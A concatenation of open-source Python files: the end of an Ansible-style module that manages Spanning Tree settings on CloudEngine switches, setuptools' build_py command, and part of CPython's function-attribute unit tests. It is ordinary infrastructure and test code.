self.existing["stp_converge"] = "normal"
if self.edged_port:
if self.interface == "all":
if "stp edged-port default" in self.stp_cfg:
self.cur_cfg["edged_port"] = "enable"
self.existing["edged_port"] = "enable"
else:
self.cur_cfg["edged_port"] = "disable"
self.existing["edged_port"] = "disable"
else:
if "stp edged-port enable" in self.interface_stp_cfg:
self.cur_cfg["edged_port"] = "enable"
self.existing["edged_port"] = "enable"
else:
self.cur_cfg["edged_port"] = "disable"
self.existing["edged_port"] = "disable"
if self.bpdu_filter:
if self.interface == "all":
if "stp bpdu-filter default" in self.stp_cfg:
self.cur_cfg["bpdu_filter"] = "enable"
self.existing["bpdu_filter"] = "enable"
else:
self.cur_cfg["bpdu_filter"] = "disable"
self.existing["bpdu_filter"] = "disable"
else:
if "stp bpdu-filter enable" in self.interface_stp_cfg:
self.cur_cfg["bpdu_filter"] = "enable"
self.existing["bpdu_filter"] = "enable"
else:
self.cur_cfg["bpdu_filter"] = "disable"
self.existing["bpdu_filter"] = "disable"
if self.bpdu_protection:
if "stp bpdu-protection" in self.stp_cfg:
self.cur_cfg["bpdu_protection"] = "enable"
self.existing["bpdu_protection"] = "enable"
else:
self.cur_cfg["bpdu_protection"] = "disable"
self.existing["bpdu_protection"] = "disable"
if self.tc_protection:
if "stp tc-protection" in self.stp_cfg:
self.cur_cfg["tc_protection"] = "enable"
self.existing["tc_protection"] = "enable"
else:
self.cur_cfg["tc_protection"] = "disable"
self.existing["tc_protection"] = "disable"
if self.tc_protection_interval:
if "stp tc-protection interval" in self.stp_cfg:
tmp_value = re.findall(r'stp tc-protection interval (.*)', self.stp_cfg)
if not tmp_value:
self.module.fail_json(
msg='Error: Can not find tc-protection interval on the device.')
self.cur_cfg["tc_protection_interval"] = tmp_value[0]
self.existing["tc_protection_interval"] = tmp_value[0]
else:
self.cur_cfg["tc_protection_interval"] = "null"
self.existing["tc_protection_interval"] = "null"
if self.tc_protection_threshold:
if "stp tc-protection threshold" in self.stp_cfg:
tmp_value = re.findall(r'stp tc-protection threshold (.*)', self.stp_cfg)
if not tmp_value:
self.module.fail_json(
msg='Error: Can not find tc-protection threshold on the device.')
self.cur_cfg["tc_protection_threshold"] = tmp_value[0]
self.existing["tc_protection_threshold"] = tmp_value[0]
else:
self.cur_cfg["tc_protection_threshold"] = "1"
self.existing["tc_protection_threshold"] = "1"
if self.cost:
tmp_value = re.findall(r'stp instance (.*) cost (.*)', self.interface_stp_cfg)
if not tmp_value:
self.cur_cfg["cost"] = "null"
self.existing["cost"] = "null"
else:
self.cur_cfg["cost"] = tmp_value[0][1]
self.existing["cost"] = tmp_value[0][1]
# root_protection and loop_protection should get configuration at the same time
if self.root_protection or self.loop_protection:
if "stp root-protection" in self.interface_stp_cfg:
self.cur_cfg["root_protection"] = "enable"
self.existing["root_protection"] = "enable"
else:
self.cur_cfg["root_protection"] = "disable"
self.existing["root_protection"] = "disable"
if "stp loop-protection" in self.interface_stp_cfg:
self.cur_cfg["loop_protection"] = "enable"
self.existing["loop_protection"] = "enable"
else:
self.cur_cfg["loop_protection"] = "disable"
self.existing["loop_protection"] = "disable"
def get_end_state(self):
""" Get end state """
self.cli_get_stp_config()
if self.interface and self.interface != "all":
self.cli_get_interface_stp_config()
if self.stp_mode:
if "stp mode stp" in self.stp_cfg:
self.end_state["stp_mode"] = "stp"
elif "stp mode rstp" in self.stp_cfg:
self.end_state["stp_mode"] = "rstp"
else:
self.end_state["stp_mode"] = "mstp"
if self.stp_enable:
if "stp disable" in self.stp_cfg:
self.end_state["stp_enable"] = "disable"
else:
self.end_state["stp_enable"] = "enable"
if self.stp_converge:
if "stp converge fast" in self.stp_cfg:
self.end_state["stp_converge"] = "fast"
else:
self.end_state["stp_converge"] = "normal"
if self.edged_port:
if self.interface == "all":
if "stp edged-port default" in self.stp_cfg:
self.end_state["edged_port"] = "enable"
else:
self.end_state["edged_port"] = "disable"
else:
if "stp edged-port enable" in self.interface_stp_cfg:
self.end_state["edged_port"] = "enable"
else:
self.end_state["edged_port"] = "disable"
if self.bpdu_filter:
if self.interface == "all":
if "stp bpdu-filter default" in self.stp_cfg:
self.end_state["bpdu_filter"] = "enable"
else:
self.end_state["bpdu_filter"] = "disable"
else:
if "stp bpdu-filter enable" in self.interface_stp_cfg:
self.end_state["bpdu_filter"] = "enable"
else:
self.end_state["bpdu_filter"] = "disable"
if self.bpdu_protection:
if "stp bpdu-protection" in self.stp_cfg:
self.end_state["bpdu_protection"] = "enable"
else:
self.end_state["bpdu_protection"] = "disable"
if self.tc_protection:
if "stp tc-protection" in self.stp_cfg:
self.end_state["tc_protection"] = "enable"
else:
self.end_state["tc_protection"] = "disable"
if self.tc_protection_interval:
if "stp tc-protection interval" in self.stp_cfg:
tmp_value = re.findall(r'stp tc-protection interval (.*)', self.stp_cfg)
if not tmp_value:
self.module.fail_json(
msg='Error: Can not find tc-protection interval on the device.')
self.end_state["tc_protection_interval"] = tmp_value[0]
else:
self.end_state["tc_protection_interval"] = "null"
if self.tc_protection_threshold:
if "stp tc-protection threshold" in self.stp_cfg:
tmp_value = re.findall(r'stp tc-protection threshold (.*)', self.stp_cfg)
if not tmp_value:
self.module.fail_json(
msg='Error: Can not find tc-protection threshold on the device.')
self.end_state["tc_protection_threshold"] = tmp_value[0]
else:
self.end_state["tc_protection_threshold"] = "1"
if self.cost:
tmp_value = re.findall(r'stp instance (.*) cost (.*)', self.interface_stp_cfg)
if not tmp_value:
self.end_state["cost"] = "null"
else:
self.end_state["cost"] = tmp_value[0][1]
if self.root_protection:
if "stp root-protection" in self.interface_stp_cfg:
self.end_state["root_protection"] = "enable"
else:
self.end_state["root_protection"] = "disable"
if self.loop_protection:
if "stp loop-protection" in self.interface_stp_cfg:
self.end_state["loop_protection"] = "enable"
else:
self.end_state["loop_protection"] = "disable"
def present_stp(self):
""" Present stp configuration """
cmds = list()
# cofig stp global
if self.stp_mode:
if self.stp_mode != self.cur_cfg["stp_mode"]:
cmd = "stp mode %s" % self.stp_mode
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.stp_enable:
if self.stp_enable != self.cur_cfg["stp_enable"]:
cmd = "stp %s" % self.stp_enable
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.stp_converge:
if self.stp_converge != self.cur_cfg["stp_converge"]:
cmd = "stp converge %s" % self.stp_converge
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.edged_port:
if self.interface == "all":
if self.edged_port != self.cur_cfg["edged_port"]:
if self.edged_port == "enable":
cmd = "stp edged-port default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp edged-port default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.bpdu_filter:
if self.interface == "all":
if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
if self.bpdu_filter == "enable":
cmd = "stp bpdu-filter default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp bpdu-filter default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.bpdu_protection:
if self.bpdu_protection != self.cur_cfg["bpdu_protection"]:
if self.bpdu_protection == "enable":
cmd = "stp bpdu-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp bpdu-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.tc_protection:
if self.tc_protection != self.cur_cfg["tc_protection"]:
if self.tc_protection == "enable":
cmd = "stp tc-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp tc-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.tc_protection_interval:
if self.tc_protection_interval != self.cur_cfg["tc_protection_interval"]:
cmd = "stp tc-protection interval %s" % self.tc_protection_interval
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.tc_protection_threshold:
if self.tc_protection_threshold != self.cur_cfg["tc_protection_threshold"]:
cmd = "stp tc-protection threshold %s" % self.tc_protection_threshold
cmds.append(cmd)
self.updates_cmd.append(cmd)
# config interface stp
if self.interface and self.interface != "all":
tmp_changed = False
cmd = "interface %s" % self.interface
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.edged_port:
if self.edged_port != self.cur_cfg["edged_port"]:
if self.edged_port == "enable":
cmd = "stp edged-port enable"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp edged-port"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.bpdu_filter:
if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
if self.bpdu_filter == "enable":
cmd = "stp bpdu-filter enable"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp bpdu-filter"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.root_protection:
if self.root_protection == "enable" and self.cur_cfg["loop_protection"] == "enable":
self.module.fail_json(
msg='Error: The interface has enable loop_protection, can not enable root_protection.')
if self.root_protection != self.cur_cfg["root_protection"]:
if self.root_protection == "enable":
cmd = "stp root-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp root-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.loop_protection:
if self.loop_protection == "enable" and self.cur_cfg["root_protection"] == "enable":
self.module.fail_json(
msg='Error: The interface has enable root_protection, can not enable loop_protection.')
if self.loop_protection != self.cur_cfg["loop_protection"]:
if self.loop_protection == "enable":
cmd = "stp loop-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp loop-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.cost:
if self.cost != self.cur_cfg["cost"]:
cmd = "stp cost %s" % self.cost
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if not tmp_changed:
cmd = "interface %s" % self.interface
self.updates_cmd.remove(cmd)
cmds.remove(cmd)
if cmds:
self.cli_load_config(cmds)
self.changed = True
def absent_stp(self):
""" Absent stp configuration """
cmds = list()
if self.stp_mode:
if self.stp_mode == self.cur_cfg["stp_mode"]:
if self.stp_mode != "mstp":
cmd = "undo stp mode"
cmds.append(cmd)
self.updates_cmd.append(cmd)
self.changed = True
if self.stp_enable:
if self.stp_enable != self.cur_cfg["stp_enable"]:
cmd = "stp %s" % self.stp_enable
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.stp_converge:
if self.stp_converge == self.cur_cfg["stp_converge"]:
cmd = "undo stp converge"
cmds.append(cmd)
self.updates_cmd.append(cmd)
self.changed = True
if self.edged_port:
if self.interface == "all":
if self.edged_port != self.cur_cfg["edged_port"]:
if self.edged_port == "enable":
cmd = "stp edged-port default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp edged-port default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.bpdu_filter:
if self.interface == "all":
if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
if self.bpdu_filter == "enable":
cmd = "stp bpdu-filter default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp bpdu-filter default"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.bpdu_protection:
if self.bpdu_protection != self.cur_cfg["bpdu_protection"]:
if self.bpdu_protection == "enable":
cmd = "stp bpdu-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp bpdu-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.tc_protection:
if self.tc_protection != self.cur_cfg["tc_protection"]:
if self.tc_protection == "enable":
cmd = "stp tc-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
else:
cmd = "undo stp tc-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.tc_protection_interval:
if self.tc_protection_interval == self.cur_cfg["tc_protection_interval"]:
cmd = "undo stp tc-protection interval"
cmds.append(cmd)
self.updates_cmd.append(cmd)
self.changed = True
if self.tc_protection_threshold:
if self.tc_protection_threshold == self.cur_cfg["tc_protection_threshold"]:
if self.tc_protection_threshold != "1":
cmd = "undo stp tc-protection threshold"
cmds.append(cmd)
self.updates_cmd.append(cmd)
self.changed = True
# undo interface stp
if self.interface and self.interface != "all":
tmp_changed = False
cmd = "interface %s" % self.interface
cmds.append(cmd)
self.updates_cmd.append(cmd)
if self.edged_port:
if self.edged_port != self.cur_cfg["edged_port"]:
if self.edged_port == "enable":
cmd = "stp edged-port enable"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp edged-port"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.bpdu_filter:
if self.bpdu_filter != self.cur_cfg["bpdu_filter"]:
if self.bpdu_filter == "enable":
cmd = "stp bpdu-filter enable"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp bpdu-filter"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.root_protection:
if self.root_protection == "enable" and self.cur_cfg["loop_protection"] == "enable":
self.module.fail_json(
msg='Error: The interface has enable loop_protection, can not enable root_protection.')
if self.root_protection != self.cur_cfg["root_protection"]:
if self.root_protection == "enable":
cmd = "stp root-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp root-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.loop_protection:
if self.loop_protection == "enable" and self.cur_cfg["root_protection"] == "enable":
self.module.fail_json(
msg='Error: The interface has enable root_protection, can not enable loop_protection.')
if self.loop_protection != self.cur_cfg["loop_protection"]:
if self.loop_protection == "enable":
cmd = "stp loop-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
else:
cmd = "undo stp loop-protection"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if self.cost:
if self.cost == self.cur_cfg["cost"]:
cmd = "undo stp cost"
cmds.append(cmd)
self.updates_cmd.append(cmd)
tmp_changed = True
if not tmp_changed:
cmd = "interface %s" % self.interface
self.updates_cmd.remove(cmd)
cmds.remove(cmd)
if cmds:
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" Work function """
self.check_params()
self.get_proposed()
self.get_existing()
if self.state == "present":
self.present_stp()
else:
self.absent_stp()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
stp_mode=dict(choices=['stp', 'rstp', 'mstp']),
stp_enable=dict(choices=['enable', 'disable']),
stp_converge=dict(choices=['fast', 'normal']),
bpdu_protection=dict(choices=['enable', 'disable']),
tc_protection=dict(choices=['enable', 'disable']),
tc_protection_interval=dict(type='str'),
tc_protection_threshold=dict(type='str'),
interface=dict(type='str'),
edged_port=dict(choices=['enable', 'disable']),
bpdu_filter=dict(choices=['enable', 'disable']),
cost=dict(type='str'),
root_protection=dict(choices=['enable', 'disable']),
loop_protection=dict(choices=['enable', 'disable'])
)
argument_spec.update(ce_argument_spec)
module = Stp(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
nagnath006/Soccer-Analytics | Soccer-Analytics/Lib/site-packages/setuptools/command/build_py.py | 231 | 9596 | from glob import glob
from distutils.util import convert_path
import distutils.command.build_py as orig
import os
import fnmatch
import textwrap
import io
import distutils.errors
import itertools
from setuptools.extern import six
from setuptools.extern.six.moves import map, filter, filterfalse
try:
from setuptools.lib2to3_ex import Mixin2to3
except ImportError:
class Mixin2to3:
def run_2to3(self, files, doctests=True):
"do nothing"
class build_py(orig.build_py, Mixin2to3):
"""Enhanced 'build_py' command that includes data files with packages
The data files are specified via a 'package_data' argument to 'setup()'.
See 'setuptools.dist.Distribution' for more details.
Also, this version of the 'build_py' command allows you to specify both
'py_modules' and 'packages' in the same setup operation.
"""
def finalize_options(self):
orig.build_py.finalize_options(self)
self.package_data = self.distribution.package_data
self.exclude_package_data = (self.distribution.exclude_package_data or
{})
if 'data_files' in self.__dict__:
del self.__dict__['data_files']
self.__updated_files = []
self.__doctests_2to3 = []
def run(self):
"""Build modules, packages, and copy data files to build directory"""
if not self.py_modules and not self.packages:
return
if self.py_modules:
self.build_modules()
if self.packages:
self.build_packages()
self.build_package_data()
self.run_2to3(self.__updated_files, False)
self.run_2to3(self.__updated_files, True)
self.run_2to3(self.__doctests_2to3, True)
# Only compile actual .py files, using our base class' idea of what our
# output files are.
self.byte_compile(orig.build_py.get_outputs(self, include_bytecode=0))
def __getattr__(self, attr):
"lazily compute data files"
if attr == 'data_files':
self.data_files = self._get_data_files()
return self.data_files
return orig.build_py.__getattr__(self, attr)
def build_module(self, module, module_file, package):
if six.PY2 and isinstance(package, six.string_types):
# avoid errors on Python 2 when unicode is passed (#190)
package = package.split('.')
outfile, copied = orig.build_py.build_module(self, module, module_file,
package)
if copied:
self.__updated_files.append(outfile)
return outfile, copied
def _get_data_files(self):
"""Generate list of '(package,src_dir,build_dir,filenames)' tuples"""
self.analyze_manifest()
return list(map(self._get_pkg_data_files, self.packages or ()))
def _get_pkg_data_files(self, package):
# Locate package source directory
src_dir = self.get_package_dir(package)
# Compute package build directory
build_dir = os.path.join(*([self.build_lib] + package.split('.')))
# Strip directory from globbed filenames
filenames = [
os.path.relpath(file, src_dir)
for file in self.find_data_files(package, src_dir)
]
return package, src_dir, build_dir, filenames
def find_data_files(self, package, src_dir):
"""Return filenames for package's data files in 'src_dir'"""
patterns = self._get_platform_patterns(
self.package_data,
package,
src_dir,
)
globs_expanded = map(glob, patterns)
# flatten the expanded globs into an iterable of matches
globs_matches = itertools.chain.from_iterable(globs_expanded)
glob_files = filter(os.path.isfile, globs_matches)
files = itertools.chain(
self.manifest_files.get(package, []),
glob_files,
)
return self.exclude_data_files(package, src_dir, files)
def build_package_data(self):
"""Copy data files into build directory"""
for package, src_dir, build_dir, filenames in self.data_files:
for filename in filenames:
target = os.path.join(build_dir, filename)
self.mkpath(os.path.dirname(target))
srcfile = os.path.join(src_dir, filename)
outf, copied = self.copy_file(srcfile, target)
srcfile = os.path.abspath(srcfile)
if (copied and
srcfile in self.distribution.convert_2to3_doctests):
self.__doctests_2to3.append(outf)
def analyze_manifest(self):
self.manifest_files = mf = {}
if not self.distribution.include_package_data:
return
src_dirs = {}
for package in self.packages or ():
# Locate package source directory
src_dirs[assert_relative(self.get_package_dir(package))] = package
self.run_command('egg_info')
ei_cmd = self.get_finalized_command('egg_info')
for path in ei_cmd.filelist.files:
d, f = os.path.split(assert_relative(path))
prev = None
oldf = f
while d and d != prev and d not in src_dirs:
prev = d
d, df = os.path.split(d)
f = os.path.join(df, f)
if d in src_dirs:
if path.endswith('.py') and f == oldf:
continue # it's a module, not data
mf.setdefault(src_dirs[d], []).append(path)
def get_data_files(self):
pass # Lazily compute data files in _get_data_files() function.
def check_package(self, package, package_dir):
"""Check namespace packages' __init__ for declare_namespace"""
try:
return self.packages_checked[package]
except KeyError:
pass
init_py = orig.build_py.check_package(self, package, package_dir)
self.packages_checked[package] = init_py
if not init_py or not self.distribution.namespace_packages:
return init_py
for pkg in self.distribution.namespace_packages:
if pkg == package or pkg.startswith(package + '.'):
break
else:
return init_py
with io.open(init_py, 'rb') as f:
contents = f.read()
if b'declare_namespace' not in contents:
raise distutils.errors.DistutilsError(
"Namespace package problem: %s is a namespace package, but "
"its\n__init__.py does not call declare_namespace()! Please "
'fix it.\n(See the setuptools manual under '
'"Namespace Packages" for details.)\n"' % (package,)
)
return init_py
def initialize_options(self):
self.packages_checked = {}
orig.build_py.initialize_options(self)
def get_package_dir(self, package):
res = orig.build_py.get_package_dir(self, package)
if self.distribution.src_root is not None:
return os.path.join(self.distribution.src_root, res)
return res
def exclude_data_files(self, package, src_dir, files):
"""Filter filenames for package's data files in 'src_dir'"""
files = list(files)
patterns = self._get_platform_patterns(
self.exclude_package_data,
package,
src_dir,
)
match_groups = (
fnmatch.filter(files, pattern)
for pattern in patterns
)
# flatten the groups of matches into an iterable of matches
matches = itertools.chain.from_iterable(match_groups)
bad = set(matches)
keepers = (
fn
for fn in files
if fn not in bad
)
# ditch dupes
return list(_unique_everseen(keepers))
@staticmethod
def _get_platform_patterns(spec, package, src_dir):
"""
yield platform-specific path patterns (suitable for glob
or fn_match) from a glob-based spec (such as
self.package_data or self.exclude_package_data)
matching package in src_dir.
"""
raw_patterns = itertools.chain(
spec.get('', []),
spec.get(package, []),
)
return (
# Each pattern has to be converted to a platform-specific path
os.path.join(src_dir, convert_path(pattern))
for pattern in raw_patterns
)
# from Python docs
def _unique_everseen(iterable, key=None):
"List unique elements, preserving order. Remember all elements ever seen."
# unique_everseen('AAAABBBCCDAABBB') --> A B C D
# unique_everseen('ABBCcAD', str.lower) --> A B C D
seen = set()
seen_add = seen.add
if key is None:
for element in filterfalse(seen.__contains__, iterable):
seen_add(element)
yield element
else:
for element in iterable:
k = key(element)
if k not in seen:
seen_add(k)
yield element
def assert_relative(path):
if not os.path.isabs(path):
return path
from distutils.errors import DistutilsSetupError
msg = textwrap.dedent("""
Error: setup script specifies an absolute path:
%s
setup() arguments must *always* be /-separated paths relative to the
setup.py directory, *never* absolute paths.
""").lstrip() % path
raise DistutilsSetupError(msg)
| mpl-2.0 |
xyzz/vcmi-build | project/jni/python/src/Lib/test/test_funcattrs.py | 51 | 11403 | from test import test_support
import types
import unittest
class FuncAttrsTest(unittest.TestCase):
def setUp(self):
class F:
def a(self):
pass
def b():
return 3
self.f = F
self.fi = F()
self.b = b
def cannot_set_attr(self,obj, name, value, exceptions):
# This method is not called as a test (name doesn't start with 'test'),
# but may be used by other tests.
try: setattr(obj, name, value)
except exceptions: pass
else: self.fail("shouldn't be able to set %s to %r" % (name, value))
try: delattr(obj, name)
except exceptions: pass
else: self.fail("shouldn't be able to del %s" % name)
class FunctionPropertiesTest(FuncAttrsTest):
# Include the external setUp method that is common to all tests
def test_module(self):
self.assertEqual(self.b.__module__, __name__)
def test_dir_includes_correct_attrs(self):
self.b.known_attr = 7
self.assert_('known_attr' in dir(self.b),
"set attributes not in dir listing of method")
# Test on underlying function object of method
self.f.a.im_func.known_attr = 7
self.assert_('known_attr' in dir(self.f.a),
"set attribute on unbound method implementation in class not in "
"dir")
self.assert_('known_attr' in dir(self.fi.a),
"set attribute on unbound method implementations, should show up"
" in next dir")
def test_duplicate_function_equality(self):
# Body of `duplicate' is the exact same as self.b
def duplicate():
'my docstring'
return 3
self.assertNotEqual(self.b, duplicate)
def test_copying_func_code(self):
def test(): pass
self.assertEqual(test(), None)
test.func_code = self.b.func_code
self.assertEqual(test(), 3) # self.b always returns 3, arbitrarily
def test_func_globals(self):
self.assertEqual(self.b.func_globals, globals())
self.cannot_set_attr(self.b, 'func_globals', 2, TypeError)
def test_func_name(self):
self.assertEqual(self.b.__name__, 'b')
self.assertEqual(self.b.func_name, 'b')
self.b.__name__ = 'c'
self.assertEqual(self.b.__name__, 'c')
self.assertEqual(self.b.func_name, 'c')
self.b.func_name = 'd'
self.assertEqual(self.b.__name__, 'd')
self.assertEqual(self.b.func_name, 'd')
# __name__ and func_name must be a string
self.cannot_set_attr(self.b, '__name__', 7, TypeError)
self.cannot_set_attr(self.b, 'func_name', 7, TypeError)
# __name__ must be available when in restricted mode. Exec will raise
# AttributeError if __name__ is not available on f.
s = """def f(): pass\nf.__name__"""
exec s in {'__builtins__': {}}
# Test on methods, too
self.assertEqual(self.f.a.__name__, 'a')
self.assertEqual(self.fi.a.__name__, 'a')
self.cannot_set_attr(self.f.a, "__name__", 'a', AttributeError)
self.cannot_set_attr(self.fi.a, "__name__", 'a', AttributeError)
def test_func_code(self):
num_one, num_two = 7, 8
def a(): pass
def b(): return 12
def c(): return num_one
def d(): return num_two
def e(): return num_one, num_two
for func in [a, b, c, d, e]:
self.assertEqual(type(func.func_code), types.CodeType)
self.assertEqual(c(), 7)
self.assertEqual(d(), 8)
d.func_code = c.func_code
self.assertEqual(c.func_code, d.func_code)
self.assertEqual(c(), 7)
# self.assertEqual(d(), 7)
try: b.func_code = c.func_code
except ValueError: pass
else: self.fail(
"func_code with different numbers of free vars should not be "
"possible")
try: e.func_code = d.func_code
except ValueError: pass
else: self.fail(
"func_code with different numbers of free vars should not be "
"possible")
def test_blank_func_defaults(self):
self.assertEqual(self.b.func_defaults, None)
del self.b.func_defaults
self.assertEqual(self.b.func_defaults, None)
def test_func_default_args(self):
def first_func(a, b):
return a+b
def second_func(a=1, b=2):
return a+b
self.assertEqual(first_func.func_defaults, None)
self.assertEqual(second_func.func_defaults, (1, 2))
first_func.func_defaults = (1, 2)
self.assertEqual(first_func.func_defaults, (1, 2))
self.assertEqual(first_func(), 3)
self.assertEqual(first_func(3), 5)
self.assertEqual(first_func(3, 5), 8)
del second_func.func_defaults
self.assertEqual(second_func.func_defaults, None)
try: second_func()
except TypeError: pass
else: self.fail(
"func_defaults does not update; deleting it does not remove "
"requirement")
class ImplicitReferencesTest(FuncAttrsTest):
def test_im_class(self):
self.assertEqual(self.f.a.im_class, self.f)
self.assertEqual(self.fi.a.im_class, self.f)
self.cannot_set_attr(self.f.a, "im_class", self.f, TypeError)
self.cannot_set_attr(self.fi.a, "im_class", self.f, TypeError)
def test_im_func(self):
self.f.b = self.b
self.assertEqual(self.f.b.im_func, self.b)
self.assertEqual(self.fi.b.im_func, self.b)
self.cannot_set_attr(self.f.b, "im_func", self.b, TypeError)
self.cannot_set_attr(self.fi.b, "im_func", self.b, TypeError)
def test_im_self(self):
self.assertEqual(self.f.a.im_self, None)
self.assertEqual(self.fi.a.im_self, self.fi)
self.cannot_set_attr(self.f.a, "im_self", None, TypeError)
self.cannot_set_attr(self.fi.a, "im_self", self.fi, TypeError)
def test_im_func_non_method(self):
# Behavior should be the same when a method is added via an attr
# assignment
self.f.id = types.MethodType(id, None, self.f)
self.assertEqual(self.fi.id(), id(self.fi))
self.assertNotEqual(self.fi.id(), id(self.f))
# Test usage
try: self.f.id.unknown_attr
except AttributeError: pass
else: self.fail("using unknown attributes should raise AttributeError")
# Test assignment and deletion
self.cannot_set_attr(self.f.id, 'unknown_attr', 2, AttributeError)
self.cannot_set_attr(self.fi.id, 'unknown_attr', 2, AttributeError)
def test_implicit_method_properties(self):
self.f.a.im_func.known_attr = 7
self.assertEqual(self.f.a.known_attr, 7)
self.assertEqual(self.fi.a.known_attr, 7)
class ArbitraryFunctionAttrTest(FuncAttrsTest):
def test_set_attr(self):
self.b.known_attr = 7
self.assertEqual(self.b.known_attr, 7)
for func in [self.f.a, self.fi.a]:
try: func.known_attr = 7
except AttributeError: pass
else: self.fail("setting attributes on methods should raise error")
def test_delete_unknown_attr(self):
try: del self.b.unknown_attr
except AttributeError: pass
else: self.fail("deleting unknown attribute should raise TypeError")
def test_setting_attrs_duplicates(self):
try: self.f.a.klass = self.f
except AttributeError: pass
else: self.fail("setting arbitrary attribute in unbound function "
" should raise AttributeError")
self.f.a.im_func.klass = self.f
for method in [self.f.a, self.fi.a, self.fi.a.im_func]:
self.assertEqual(method.klass, self.f)
def test_unset_attr(self):
for func in [self.b, self.f.a, self.fi.a]:
try: func.non_existant_attr
except AttributeError: pass
else: self.fail("using unknown attributes should raise "
"AttributeError")
class FunctionDictsTest(FuncAttrsTest):
def test_setting_dict_to_invalid(self):
self.cannot_set_attr(self.b, '__dict__', None, TypeError)
self.cannot_set_attr(self.b, 'func_dict', None, TypeError)
from UserDict import UserDict
d = UserDict({'known_attr': 7})
self.cannot_set_attr(self.f.a.im_func, '__dict__', d, TypeError)
self.cannot_set_attr(self.fi.a.im_func, '__dict__', d, TypeError)
def test_setting_dict_to_valid(self):
d = {'known_attr': 7}
self.b.__dict__ = d
# Setting dict is only possible on the underlying function objects
self.f.a.im_func.__dict__ = d
# Test assignment
self.assertEqual(d, self.b.__dict__)
self.assertEqual(d, self.b.func_dict)
# ... and on all the different ways of referencing the method's func
self.assertEqual(d, self.f.a.im_func.__dict__)
self.assertEqual(d, self.f.a.__dict__)
self.assertEqual(d, self.fi.a.im_func.__dict__)
self.assertEqual(d, self.fi.a.__dict__)
# Test value
self.assertEqual(self.b.known_attr, 7)
self.assertEqual(self.b.__dict__['known_attr'], 7)
self.assertEqual(self.b.func_dict['known_attr'], 7)
# ... and again, on all the different method's names
self.assertEqual(self.f.a.im_func.known_attr, 7)
self.assertEqual(self.f.a.known_attr, 7)
self.assertEqual(self.fi.a.im_func.known_attr, 7)
self.assertEqual(self.fi.a.known_attr, 7)
def test_delete_func_dict(self):
try: del self.b.__dict__
except TypeError: pass
else: self.fail("deleting function dictionary should raise TypeError")
try: del self.b.func_dict
except TypeError: pass
else: self.fail("deleting function dictionary should raise TypeError")
def test_unassigned_dict(self):
self.assertEqual(self.b.__dict__, {})
def test_func_as_dict_key(self):
value = "Some string"
d = {}
d[self.b] = value
self.assertEqual(d[self.b], value)
class FunctionDocstringTest(FuncAttrsTest):
def test_set_docstring_attr(self):
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.func_doc, None)
docstr = "A test method that does nothing"
self.b.__doc__ = self.f.a.im_func.__doc__ = docstr
self.assertEqual(self.b.__doc__, docstr)
self.assertEqual(self.b.func_doc, docstr)
self.assertEqual(self.f.a.__doc__, docstr)
self.assertEqual(self.fi.a.__doc__, docstr)
self.cannot_set_attr(self.f.a, "__doc__", docstr, AttributeError)
self.cannot_set_attr(self.fi.a, "__doc__", docstr, AttributeError)
def test_delete_docstring(self):
self.b.__doc__ = "The docstring"
del self.b.__doc__
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.func_doc, None)
